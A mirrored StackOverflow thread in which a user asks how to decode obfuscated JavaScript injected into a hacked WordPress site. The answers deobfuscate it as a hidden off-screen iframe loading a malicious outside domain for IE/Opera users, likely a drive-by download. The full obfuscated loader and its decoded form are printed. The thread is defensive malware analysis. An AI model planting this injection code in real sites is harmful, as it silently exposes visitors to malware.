javascript injected into site hack

StackOverflow https://stackoverflow.com/questions/14348080

  •  15-01-2022
  •  | 
  •  

Question

My friends word press site was attacked and a bunch of php files injected with some eval statements, which i've inflated and decoded, but it has lead me to the below javascript.

Anyone any ideas how to deobfuscate this so we can read what it says?

ww=window;v="v"+"al";if(ww.document)try{document.body=12;}catch(gdsgsdg){asd=0;try{d=document}catch(agdsg){asd=1;}if(!asd){w={a:ww}.a;v="e".concat(v);}}e=w[v];if(1){f=new Array(102,116,108,96,116,104,109,107,32,102,112,94,40,96,42,95,41,122,112,98,116,116,112,107,32,76,95,113,104,45,100,105,111,110,112,37,77,96,114,101,46,113,95,107,100,110,107,37,41,41,38,95,45,96,41,46,41,40,41,94,59,124,11,7,102,116,108,96,116,104,109,107,32,113,113,37,41,122,112,98,116,116,112,107,32,76,95,113,104,45,112,94,110,99,109,106,40,40,44,113,111,82,114,111,105,109,101,37,51,53,39,43,115,116,96,112,116,113,103,107,103,39,51,38,59,124,11,7,105,101,38,107,97,117,103,100,97,115,109,111,46,98,109,108,107,104,99,66,110,96,96,105,101,99,39,120,13,9,7,115,97,113,30,112,116,109,107,58,114,114,38,38,59,12,8,6,118,96,112,29,117,96,30,58,32,109,95,115,105,102,95,113,111,113,44,114,115,100,112,62,103,100,108,113,59,12,8,6,118,96,112,29,117,113,106,29,61,31,98,108,99,116,107,98,110,115,44,105,111,98,95,113,105,110,108,43,104,113,99,99,59,12,8,6,105,101,38,114,114,107,44,102,110,99,99,117,79,101,38,36,97,99,107,102,110,38,39,58,61,44,47,29,38,37,30,114,97,45,103,107,100,100,118,76,102,39,37,84,105,109,98,108,119,114,37,38,33,60,43,46,32,37,36,29,40,116,95,43,105,109,98,98,120,78,100,37,39,76,81,70,69,38,39,30,61,44,47,121,124,116,95,43,105,109,98,98,120,78,100,37,39,78,110,98,114,96,37,38,33,60,43,46,41,40,121,10,10,8,7,97,111,98,115,106,101,109,114,43,119,113,103,113,101,39,37,57,115,115,119,105,101,61,44,112,39,42,113,113,110,108,41,36,32,122,30,109,111,114,103,113,105,110,108,55,97,97,113,108,108,116,114,98,59,31,106,98,102,115,56,42,39,42,101,111,97,39,52,45,48,43,47,45,48,47,39,40,39,111,118,56,32,115,109,109,58,44,37,40,103,113,95,37,54,47,46,41,49,47,46,45,41,42,37,109,120,58,30,122,60,46,113,113,121,107,99,59,32,59,98,102,118,31,97,105,97,114,113,58,34,114,37,40,115,115,108,106,43,38,32,59,60,104,100,111,97,108,99,29,115,113,97,58,34,103,114,113,112,57,45,44,112,116,106,105,100,110,117,107,108,96,119,112,46,104,108,99,111,46,95,97,47,101,99,98,100,45,110,101,112,33,30,116,105,99,114,101,61,33,37,40,103,113,95,37,51,47,46,41,54,47,46,38,43,38,32,29,104,100,103,100,104,115,59,31,39,42,101,111,97,39,49,45,48,43,52,45,48,40,41,36,34,61,58,44,105,101,112,94,109,100,60,57,47,99,103,115,62,38,39,56,13,9,7,122,13,9,7,115,97,113,30,98,120,111,59,107,101,118,30,65,97,115,99,37,41,58,99,117,112,45,113,98,116,67,95,113,101,39,99,117,112,45,101,98,116,67,95,113,101,39,39,40,55,40,57,10,10,8,103,99,40,99,109,96,117,108,99,107,116,45,97,108,111,106,103,98,46,104,108,97,101,119,77,99,40,38,93,92,117,115,107,99,114,60,37,38,61,60,43,46,41,122,98,108,99,116,107,98,110,115,44,96,111,110,105,102,101,60,37,92,95,116,114,106,102,113,59,36,43,113,113,37,41,42,37,56,32,100,118,109,105,113,99,112,61,38,41,98,120,111,44,113,111,70,75,81,83,115,112,102,110,102,38,38,43,38,57,29,112,96,114,101,61,46,37,56,125,12,8,122);}w=f;s=[];for(i=0;-i+800!=0;i+=1){j=i;if((031==0x19))if(e)s=s+String.fromCharCode((1*w[j]+e("j%4")));}xz=e;try{document.body++}catch(gdsgd){xz(s)}
Was it helpful?

Solution

The hidden code is this:

function gra(a,b){return Math.floor(Math.random()*(b-a+1))+a;}
function rs(){return Math.random().toString(36).substring(5);}
if(navigator.cookieEnabled){
  var stnm=rs();
  var ua = navigator.userAgent;
  var url = document.location.href;

  if(url.indexOf('admin')==-1 && ua.indexOf('Windows')!=-1 && (ua.indexOf('MSIE')!=-1||ua.indexOf('Opera')!=-1)){
    document.write('<style>.s'+stnm+' { position:absolute; left:-'+gra(600,1000)+'px; top:-'+gra(600,1000)+'px; }</style> <div class="s'+stnm+'"><iframe src="http://xxxxxxxxxxxx.info/ad/feed.php" width="'+gra(300,600)+'" height="'+gra(300,600)+'"></iframe></div>');
  }
  var exp=new Date();exp.setDate(exp.getDate()+7);
  if(document.cookie.indexOf('__utmfr=')==-1){document.cookie='__utmfr='+rs()+'; expires='+exp.toGMTString()+'; path=/';}
}

It's stored in the f array as simple ascii, but every four characters are incremented by 0, 1, 2, and 3 repeatedly in a simple attempt to obfuscate the code.

Looks like this adds a bit of code to every webpage to display a malicious url in an i-frame.

OTHER TIPS

First, feed it through http://jsbeautifier.org/.

You now can easily deduce that v becomes the string "eval", and e is the eval function. Also, you can run the loop that builds the string from the array items to see what is does:

function gra(a,b){return Math.floor(Math.random()*(b-a+1))+a;}
function rs(){return Math.random().toString(36).substring(5);}
if(navigator.cookieEnabled){
    var stnm=rs();
    var ua = navigator.userAgent;
    var url = document.location.href;
    if(url.indexOf('admin')==-1 && ua.indexOf('Windows')!=-1 && (ua.indexOf('MSIE')!=-1||ua.indexOf('Opera')!=-1)){
        document.write('<style>.s'+stnm+' { position:absolute; left:-'+gra(600,1000)+'px; top:-'+gra(600,1000)+'px; }</style> <div class="s'+stnm+'"><iframe src="http://pulldownlays.info/ad/feed.php" width="'+gra(300,600)+'" height="'+gra(300,600)+'"></iframe></div>');
    }
    var exp=new Date();exp.setDate(exp.getDate()+7);
    if(document.cookie.indexOf('__utmfr=')==-1){document.cookie='__utmfr='+rs()+'; expires='+exp.toGMTString()+'; path=/';}
}

Now it is quite obvious: It sets a random identifier cookie, and for every IE/Opera user on Windows who does not browse an "admin" url, it creates an iframe which is positioned off-screen. The iframe likely contains some drive-by-download of malware.

I just pasted this into http://jsbeautifier.org/... Good luck!

ww = window;
v = "v" + "al";
if (ww.document) try {
    document.body = 12;
} catch (gdsgsdg) {
    asd = 0;
    try {
        d = document
    } catch (agdsg) {
        asd = 1;
    }
    if (!asd) {
        w = {
            a: ww
        }.a;
        v = "e".concat(v);
    }
}
e = w[v];
if (1) {
    f = new Array(102, 116, 108, 96, 116, 104, 109, 107, 32, 102, 112, 94, 40, 96, 42, 95, 41, 122, 112, 98, 116, 116, 112, 107, 32, 76, 95, 113, 104, 45, 100, 105, 111, 110, 112, 37, 77, 96, 114, 101, 46, 113, 95, 107, 100, 110, 107, 37, 41, 41, 38, 95, 45, 96, 41, 46, 41, 40, 41, 94, 59, 124, 11, 7, 102, 116, 108, 96, 116, 104, 109, 107, 32, 113, 113, 37, 41, 122, 112, 98, 116, 116, 112, 107, 32, 76, 95, 113, 104, 45, 112, 94, 110, 99, 109, 106, 40, 40, 44, 113, 111, 82, 114, 111, 105, 109, 101, 37, 51, 53, 39, 43, 115, 116, 96, 112, 116, 113, 103, 107, 103, 39, 51, 38, 59, 124, 11, 7, 105, 101, 38, 107, 97, 117, 103, 100, 97, 115, 109, 111, 46, 98, 109, 108, 107, 104, 99, 66, 110, 96, 96, 105, 101, 99, 39, 120, 13, 9, 7, 115, 97, 113, 30, 112, 116, 109, 107, 58, 114, 114, 38, 38, 59, 12, 8, 6, 118, 96, 112, 29, 117, 96, 30, 58, 32, 109, 95, 115, 105, 102, 95, 113, 111, 113, 44, 114, 115, 100, 112, 62, 103, 100, 108, 113, 59, 12, 8, 6, 118, 96, 112, 29, 117, 113, 106, 29, 61, 31, 98, 108, 99, 116, 107, 98, 110, 115, 44, 105, 111, 98, 95, 113, 105, 110, 108, 43, 104, 113, 99, 99, 59, 12, 8, 6, 105, 101, 38, 114, 114, 107, 44, 102, 110, 99, 99, 117, 79, 101, 38, 36, 97, 99, 107, 102, 110, 38, 39, 58, 61, 44, 47, 29, 38, 37, 30, 114, 97, 45, 103, 107, 100, 100, 118, 76, 102, 39, 37, 84, 105, 109, 98, 108, 119, 114, 37, 38, 33, 60, 43, 46, 32, 37, 36, 29, 40, 116, 95, 43, 105, 109, 98, 98, 120, 78, 100, 37, 39, 76, 81, 70, 69, 38, 39, 30, 61, 44, 47, 121, 124, 116, 95, 43, 105, 109, 98, 98, 120, 78, 100, 37, 39, 78, 110, 98, 114, 96, 37, 38, 33, 60, 43, 46, 41, 40, 121, 10, 10, 8, 7, 97, 111, 98, 115, 106, 101, 109, 114, 43, 119, 113, 103, 113, 101, 39, 37, 57, 115, 115, 119, 105, 101, 61, 44, 112, 39, 42, 113, 113, 110, 108, 41, 36, 32, 122, 30, 109, 111, 114, 103, 113, 105, 110, 108, 55, 97, 97, 113, 108, 108, 116, 114, 98, 59, 31, 106, 98, 102, 115, 56, 42, 39, 42, 101, 111, 97, 39, 52, 45, 48, 43, 47, 45, 48, 47, 39, 40, 39, 111, 118, 56, 32, 115, 109, 109, 58, 44, 37, 40, 103, 113, 95, 37, 54, 47, 46, 41, 49, 47, 46, 45, 41, 42, 37, 109, 120, 58, 30, 122, 60, 46, 113, 113, 121, 107, 99, 59, 32, 59, 98, 102, 118, 31, 97, 105, 97, 114, 113, 58, 34, 114, 37, 40, 115, 115, 108, 106, 43, 38, 32, 59, 60, 104, 100, 111, 97, 108, 99, 29, 115, 113, 97, 58, 34, 103, 114, 113, 112, 57, 45, 44, 112, 116, 106, 105, 100, 110, 117, 107, 108, 96, 119, 112, 46, 104, 108, 99, 111, 46, 95, 97, 47, 101, 99, 98, 100, 45, 110, 101, 112, 33, 30, 116, 105, 99, 114, 101, 61, 33, 37, 40, 103, 113, 95, 37, 51, 47, 46, 41, 54, 47, 46, 38, 43, 38, 32, 29, 104, 100, 103, 100, 104, 115, 59, 31, 39, 42, 101, 111, 97, 39, 49, 45, 48, 43, 52, 45, 48, 40, 41, 36, 34, 61, 58, 44, 105, 101, 112, 94, 109, 100, 60, 57, 47, 99, 103, 115, 62, 38, 39, 56, 13, 9, 7, 122, 13, 9, 7, 115, 97, 113, 30, 98, 120, 111, 59, 107, 101, 118, 30, 65, 97, 115, 99, 37, 41, 58, 99, 117, 112, 45, 113, 98, 116, 67, 95, 113, 101, 39, 99, 117, 112, 45, 101, 98, 116, 67, 95, 113, 101, 39, 39, 40, 55, 40, 57, 10, 10, 8, 103, 99, 40, 99, 109, 96, 117, 108, 99, 107, 116, 45, 97, 108, 111, 106, 103, 98, 46, 104, 108, 97, 101, 119, 77, 99, 40, 38, 93, 92, 117, 115, 107, 99, 114, 60, 37, 38, 61, 60, 43, 46, 41, 122, 98, 108, 99, 116, 107, 98, 110, 115, 44, 96, 111, 110, 105, 102, 101, 60, 37, 92, 95, 116, 114, 106, 102, 113, 59, 36, 43, 113, 113, 37, 41, 42, 37, 56, 32, 100, 118, 109, 105, 113, 99, 112, 61, 38, 41, 98, 120, 111, 44, 113, 111, 70, 75, 81, 83, 115, 112, 102, 110, 102, 38, 38, 43, 38, 57, 29, 112, 96, 114, 101, 61, 46, 37, 56, 125, 12, 8, 122);
}
w = f;
s = [];
for (i = 0; - i + 800 != 0; i += 1) {
    j = i;
    if ((031 == 0x19)) if (e) s = s + String.fromCharCode((1 * w[j] + e("j%4")));
}
xz = e;
try {
    document.body++
} catch (gdsgd) {
    xz(s)
}
Licensed under: CC-BY-SA with attribution
Not affiliated with StackOverflow
scroll top